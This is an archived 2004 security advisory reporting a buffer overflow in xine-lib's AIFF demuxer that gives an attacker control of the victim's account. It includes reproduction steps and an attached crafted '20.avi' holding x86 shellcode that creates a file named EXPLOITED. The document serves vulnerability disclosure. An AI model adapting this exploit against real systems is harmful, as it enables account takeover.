Mailing-List: contact securesoftware-help@list.cr.yp.to; run by ezmlm Delivered-To: mailing list securesoftware@list.cr.yp.to Received: (qmail 27010 invoked by uid 1017); 15 Dec 2004 08:19:21 -0000 Date: 15 Dec 2004 08:19:21 -0000 Message-ID: <20041215081921.27009.qmail@cr.yp.to> Mail-Followup-To: securesoftware@list.cr.yp.to, xine-user@lists.sourceforge.net Automatic-Legal-Notices: See http://cr.yp.to/mailcopyright.html. From: "D. J. Bernstein" To: securesoftware@list.cr.yp.to, xine-user@lists.sourceforge.net Subject: [remote] [control] xine-lib open_aiff_file overflows buffer Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="sm4nu43k4a2Rpi4c" Content-Disposition: inline --sm4nu43k4a2Rpi4c Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Ariel Berkman, a student in my Fall 2004 UNIX Security Holes course, has discovered a remotely exploitable security hole in xine-lib. I'm publishing this notice, but all the discovery credits should be assigned to Berkman. You are at risk if you take a file from the web (or email or any other source that could be controlled by an attacker) and feed that file through xine or any other xine-lib frontend. Whoever provides that file then has complete control over your account: he can read and modify your files, watch the programs you're running, etc. Proof of concept: On an x86 computer running FreeBSD 4.10, as root, type cd /usr/ports/multimedia/xine make install to download and compile the xine-lib library, version 1-rc5, and the xine program. (Version 1-rc5 has other problems but is the latest ports version. Version 1-rc7 fixes several bugs but does not fix the bug used here.) Then save the file 20.avi attached to this message, and type xine 20.avi with the unauthorized result that a file named EXPLOITED is created in the current directory. (I tested this with a 577-byte environment, as reported by printenv | wc -c; beware that 20.avi is sensitive to the environment size.) Here's the bug: In demux_aiff.c, open_aiff_file() reads an input-specified amount of data into a 100-byte buffer[] array. ---D. J. Bernstein, Associate Professor, Department of Mathematics, Statistics, and Computer Science, University of Illinois at Chicago --sm4nu43k4a2Rpi4c Content-Type: video/x-msvideo Content-Disposition: attachment; filename="20.avi" Content-Transfer-Encoding: quoted-printable FORM1234AIFFCOMM=00=00=04=00=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01= =01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01= =01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01= =01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01= =01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01@=E7=BF= =BFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=EB(Y1= =C0=88A @@@=C1=E0=07P=B8=124V=02=C1=E8=18=C1=E0=08PQ1=C0=B0=05P=CD=801=C0P@= P=CD=80=E8=D3=FF=FF=FFEXPLOITEDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA --sm4nu43k4a2Rpi4c--